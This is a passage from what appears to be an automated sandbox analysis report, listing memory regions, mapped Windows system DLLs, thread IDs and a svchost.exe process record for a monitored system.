entry_point = 0x74f80000
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 3852
start_va = 0x74810000
end_va = 0x74817fff
entry_point = 0x74810000
region_type = mapped_file
name = "credssp.dll"
filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")
Region:
id = 3853
start_va = 0x74950000
end_va = 0x74989fff
entry_point = 0x74950000
region_type = mapped_file
name = "schannel.dll"
filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll")
Region:
id = 3854
start_va = 0x750e0000
end_va = 0x750ebfff
entry_point = 0x750e0000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 3855
start_va = 0x751b0000
end_va = 0x752ccfff
entry_point = 0x751b0000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 3856
start_va = 0x510000
end_va = 0x512fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000510000"
filename = ""
Region:
id = 3857
start_va = 0x6e0000
end_va = 0x6e4fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006e0000"
filename = ""
Region:
id = 3858
start_va = 0xe10000
end_va = 0xe4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e10000"
filename = ""
Region:
id = 3859
start_va = 0xe90000
end_va = 0xe91fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000e90000"
filename = ""
Region:
id = 3860
start_va = 0xf30000
end_va = 0x102ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000f30000"
filename = ""
Region:
id = 3861
start_va = 0x1040000
end_va = 0x107ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001040000"
filename = ""
Region:
id = 3862
start_va = 0x73af0000
end_va = 0x73afefff
entry_point = 0x73af0000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 3863
start_va = 0x73b00000
end_va = 0x73b08fff
entry_point = 0x73b00000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 3864
start_va = 0x73b10000
end_va = 0x73b20fff
entry_point = 0x73b10000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 3865
start_va = 0x74f10000
end_va = 0x74f28fff
entry_point = 0x74f10000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 3866
start_va = 0x7ffd7000
end_va = 0x7ffd7fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd7000"
filename = ""
Region:
id = 3867
start_va = 0x7ffdc000
end_va = 0x7ffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdc000"
filename = ""
Region:
id = 3868
start_va = 0x731b0000
end_va = 0x731befff
entry_point = 0x731b0000
region_type = mapped_file
name = "samcli.dll"
filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll")
Region:
id = 3869
start_va = 0x74990000
end_va = 0x749b1fff
entry_point = 0x74990000
region_type = mapped_file
name = "logoncli.dll"
filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll")
Region:
id = 3870
start_va = 0x6cf10000
end_va = 0x6cf1cfff
entry_point = 0x6cf10000
region_type = mapped_file
name = "browcli.dll"
filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll")
Region:
id = 3871
start_va = 0x6cf00000
end_va = 0x6cf07fff
entry_point = 0x6cf00000
region_type = mapped_file
name = "schedcli.dll"
filename = "\\Windows\\System32\\schedcli.dll" (normalized: "c:\\windows\\system32\\schedcli.dll")
Region:
id = 3872
start_va = 0x73e20000
end_va = 0x73e28fff
entry_point = 0x73e20000
region_type = mapped_file
name = "dsrole.dll"
filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")
Region:
id = 3873
start_va = 0x700d0000
end_va = 0x700dafff
entry_point = 0x700d0000
region_type = mapped_file
name = "cscapi.dll"
filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll")
Region:
id = 3874
start_va = 0x1240000
end_va = 0x13a2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001240000"
filename = ""
Region:
id = 3875
start_va = 0x6ced0000
end_va = 0x6cef9fff
entry_point = 0x6ced0000
region_type = mapped_file
name = "wmipcima.dll"
filename = "\\Windows\\System32\\wbem\\wmipcima.dll" (normalized: "c:\\windows\\system32\\wbem\\wmipcima.dll")
Region:
id = 3876
start_va = 0x752d0000
end_va = 0x752f6fff
entry_point = 0x752d0000
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 3877
start_va = 0x75300000
end_va = 0x75311fff
entry_point = 0x75300000
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 3878
start_va = 0x6cec0000
end_va = 0x6cec2fff
entry_point = 0x6cec0000
region_type = mapped_file
name = "wmi.dll"
filename = "\\Windows\\System32\\wmi.dll" (normalized: "c:\\windows\\system32\\wmi.dll")
Region:
id = 3879
start_va = 0x75030000
end_va = 0x75058fff
entry_point = 0x75030000
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 3880
start_va = 0x743d0000
end_va = 0x743f4fff
entry_point = 0x743d0000
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 3881
start_va = 0x76c00000
end_va = 0x76d9cfff
entry_point = 0x76c00000
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Thread:
id = 51
os_tid = 0xa60
Thread:
id = 52
os_tid = 0xa64
Thread:
id = 53
os_tid = 0xa68
Thread:
id = 54
os_tid = 0xa6c
Thread:
id = 55
os_tid = 0xa70
Thread:
id = 56
os_tid = 0xa74
Thread:
id = 57
os_tid = 0xa78
Thread:
id = 112
os_tid = 0xb5c
Thread:
id = 253
os_tid = 0x830
Thread:
id = 254
os_tid = 0x82c
Thread:
id = 255
os_tid = 0x828
Thread:
id = 339
os_tid = 0x908
Process:
id = "5"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0x7f1be1e0"
os_pid = "0x3c8"
os_integrity_level = "0x4000"
os_privileges = "0x60800000"
monitor_reason = "rpc_server"
parent_id = "2"
os_parent_pid = "0x9a4"
cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\Local Service"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bac6" [0xc000000f], "LOCAL" [0x7]
Region:
id = 676
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 677
start_va = 0x20000
end_va = 0x26fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 678
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 679
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 680
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 681
start_va = 0xc0000
end_va = 0xc1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000c0000"
filename = ""
Region:
id = 682
start_va = 0xd0000
end_va = 0xd0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 683
start_va = 0xe0000
end_va = 0xe0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 684
start_va = 0xf0000
end_va = 0xf0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000f0000"
filename = ""
Region:
id = 685
start_va = 0x100000
end_va = 0x10ffff
entry_point = 0x100000
region_type = mapped_file
name = "es.dll"
filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")
Region:
id = 686
start_va = 0x110000
end_va = 0x14ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 687
start_va = 0x150000
end_va = 0x1cffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000150000"
filename = ""
Region:
id = 688
start_va = 0x1d0000
end_va = 0x1d3fff
entry_point = 0x1d0000
region_type = mapped_file
name = "stdole2.tlb"
filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb")
Region:
id = 689
start_va = 0x1e0000
end_va = 0x1e1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 690
start_va = 0x1f0000
end_va = 0x1fffff
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 691
start_va = 0x200000
end_va = 0x2c7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000200000"
filename = ""
Region:
id = 692
start_va = 0x2d0000
end_va = 0x30ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000002d0000"
filename = ""
Region:
id = 693
start_va = 0x310000
end_va = 0x310fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000310000"
filename = ""
Region:
id = 694
start_va = 0x320000
end_va = 0x320fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000320000"
filename = ""
Region:
id = 695
start_va = 0x330000
end_va = 0x33ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000330000"
filename = ""
Region:
id = 696
start_va = 0x370000
end_va = 0x3affff
entry_point = 0x0
region_type = private
name = "private_0x0000000000370000"
filename = ""
Region:
id = 697
start_va = 0x3b0000
end_va = 0x3b7fff
entry_point = 0x3b0000
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 698
start_va = 0x3c0000
end_va = 0x4c0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003c0000"
filename = ""
Region:
id = 699
start_va = 0x4d0000
end_va = 0x50ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000004d0000"
filename = ""
Region:
id = 700
start_va = 0x550000
end_va = 0x58ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000550000"
filename = ""
Region:
id = 701
start_va = 0x5a0000
end_va = 0x69ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000005a0000"
filename = ""
Region:
id = 702
start_va = 0x6a0000
end_va = 0xa92fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006a0000"
filename = ""
Region:
id = 703
start_va = 0xac0000
end_va = 0xafffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000ac0000"
filename = ""
Region:
id = 704
start_va = 0xb10000
end_va = 0xb4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 705
start_va = 0xb50000
end_va = 0xe1efff
entry_point = 0xb50000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 706
start_va = 0xe20000
end_va = 0xe9ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e20000"
filename = ""
Region:
id = 707
start_va = 0xea0000
end_va = 0xedffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000ea0000"
filename = ""
Region:
id = 708
start_va = 0xee0000
end_va = 0xf1ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000ee0000"
filename = ""
Region:
id = 709
start_va = 0xf30000
end_va = 0xf6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000f30000"
filename = ""
Region:
id = 710
start_va = 0xf70000
end_va = 0xfaffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000f70000"
filename = ""
Region:
id = 711
start_va = 0x1010000
end_va = 0x104ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001010000"
filename = ""
Region:
id = 712
start_va = 0x10a0000
end_va = 0x10dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000010a0000"
filename = ""
Region:
id = 713
start_va = 0x10f0000
end_va = 0x112ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000010f0000"
filename = ""
Region:
id = 714
start_va = 0x1130000
end_va = 0x116ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001130000"
filename = ""
Region:
id = 715
start_va = 0x1180000
end_va = 0x118ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001180000"
filename = ""
Region:
id = 716
start_va = 0x1190000
end_va = 0x128ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001190000"
filename = ""
Region:
id = 717
start_va = 0x12f0000
end_va = 0x132ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000012f0000"
filename = ""
Region:
id = 718
start_va = 0x1370000
end_va = 0x146ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001370000"
filename = ""
Region:
id = 719
start_va = 0x1470000
end_va = 0x152ffff
entry_point = 0x1470000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 720
start_va = 0x1660000
end_va = 0x166ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001660000"
filename = ""
Region:
id = 721
start_va = 0x1670000
end_va = 0x16affff
entry_point = 0x0
region_type = private
name = "private_0x0000000001670000"
filename = ""
Region:
id = 722
start_va = 0x6de50000
end_va = 0x6de5cfff
entry_point = 0x6de50000
region_type = mapped_file
name = "sfc_os.dll"
filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll")
Region:
id = 723
start_va = 0x6de60000
end_va = 0x6de62fff
entry_point = 0x6de60000
region_type = mapped_file
name = "sfc.dll"
filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll")
Region:
id = 724
start_va = 0x6de70000
end_va = 0x6de81fff
entry_point = 0x6de70000
region_type = mapped_file
name = "aepic.dll"
filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll")
Region:
id = 725
start_va = 0x6de90000
end_va = 0x6df1ffff
entry_point = 0x6de90000
region_type = mapped_file
name = "perftrack.dll"
filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll")
Region:
id = 726
start_va = 0x6dfb0000
end_va = 0x6dfb7fff
entry_point = 0x6dfb0000
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 727
start_va = 0x6e0d0000
end_va = 0x6e129fff
entry_point = 0x6e0d0000
region_type = mapped_file
name = "netprofm.dll"
filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")
Region:
id = 728
start_va = 0x6f250000
end_va = 0x6f2b0fff
entry_point = 0x6f250000
region_type = mapped_file
name = "wer.dll"
filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll")
Region:
id = 729
start_va = 0x6fa30000
end_va = 0x6fa7efff
entry_point = 0x6fa30000
region_type = mapped_file
name = "webio.dll"
filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll")
Region:
id = 730
start_va = 0x6fa80000
end_va = 0x6fad7fff
entry_point = 0x6fa80000
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 731
start_va = 0x70000000
end_va = 0x70014fff
entry_point = 0x70000000
region_type = mapped_file
name = "wdi.dll"
filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll")
Region:
id = 732
start_va = 0x70020000
end_va = 0x70025fff
entry_point = 0x70020000
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 733
start_va = 0x713b0000
end_va = 0x713fbfff
entry_point = 0x713b0000
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")
Region:
id = 734
start_va = 0x73240000
end_va = 0x73247fff
entry_point = 0x73240000
region_type = mapped_file
name = "winrnr.dll"
filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")
Region:
id = 735
start_va = 0x73250000
end_va = 0x73261fff
entry_point = 0x73250000
region_type = mapped_file
name = "pnrpnsp.dll"
filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")
Region:
id = 736
start_va = 0x73280000
end_va = 0x7328ffff
entry_point = 0x73280000
region_type = mapped_file
name = "napinsp.dll"
filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")
Region:
id = 737
start_va = 0x733b0000
end_va = 0x733c2fff
entry_point = 0x733b0000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 738
start_va = 0x73c00000
end_va = 0x73c11fff
entry_point = 0x73c00000
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 739
start_va = 0x73c20000
end_va = 0x73c57fff
entry_point = 0x73c20000
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 740
start_va = 0x73c70000
end_va = 0x73c7cfff
entry_point = 0x73c70000
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 741
start_va = 0x73d40000
end_va = 0x73d47fff
entry_point = 0x73d40000
region_type = mapped_file
name = "nsisvc.dll"
filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll")
Region:
id = 742
start_va = 0x73d60000
end_va = 0x73d66fff
entry_point = 0x73d60000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 743
start_va = 0x73d70000
end_va = 0x73d8bfff
entry_point = 0x73d70000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 744
start_va = 0x73db0000
end_va = 0x73df6fff
entry_point = 0x73db0000
region_type = mapped_file
name = "es.dll"
filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")
Region:
id = 745
start_va = 0x73e20000
end_va = 0x73e28fff
entry_point = 0x73e20000
region_type = mapped_file
name = "dsrole.dll"
filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")
Region:
id = 746
start_va = 0x74070000
end_va = 0x7407ffff
entry_point = 0x74070000
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 747
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 748
start_va = 0x74650000
end_va = 0x74654fff
entry_point = 0x74650000
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll")
Region:
id = 749
start_va = 0x74700000
end_va = 0x74715fff
entry_point = 0x74700000
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 750
start_va = 0x74720000
end_va = 0x74736fff
entry_point = 0x74720000
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 751
start_va = 0x74810000
end_va = 0x74817fff
entry_point = 0x74810000
region_type = mapped_file
name = "credssp.dll"
filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")
Region:
id = 752
start_va = 0x748e0000
end_va = 0x7491afff
entry_point = 0x748e0000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 753
start_va = 0x749c0000
end_va = 0x74a03fff
entry_point = 0x749c0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 754
start_va = 0x74af0000
end_va = 0x74af5fff
entry_point = 0x74af0000
region_type = mapped_file
name = "wship6.dll"
filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")
Region:
id = 755
start_va = 0x74b00000
end_va = 0x74b3bfff
entry_point = 0x74b00000
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 756
start_va = 0x74b40000
end_va = 0x74b55fff
entry_point = 0x74b40000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 757
start_va = 0x74f80000
end_va = 0x74f87fff
entry_point = 0x74f80000
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 758
start_va = 0x74fa0000
end_va = 0x74fbafff
entry_point = 0x74fa0000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 759
start_va = 0x74fc0000
end_va = 0x74fcbfff
entry_point = 0x74fc0000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 760
start_va = 0x74fd0000
end_va = 0x7502efff
entry_point = 0x74fd0000
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 761
start_va = 0x75060000
end_va = 0x7506dfff
entry_point = 0x75060000
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 762
start_va = 0x75070000
end_va = 0x7507afff
entry_point = 0x75070000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 763
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 764
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 765
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 766
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 767
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 768
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 769
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 770
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 771
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 772
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 773
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 774
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 775
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 776
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 777
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 778
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 779
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 780
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 781
start_va = 0x770c0000
end_va = 0x77142fff
entry_point = 0x770c0000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 782
start_va = 0x77160000
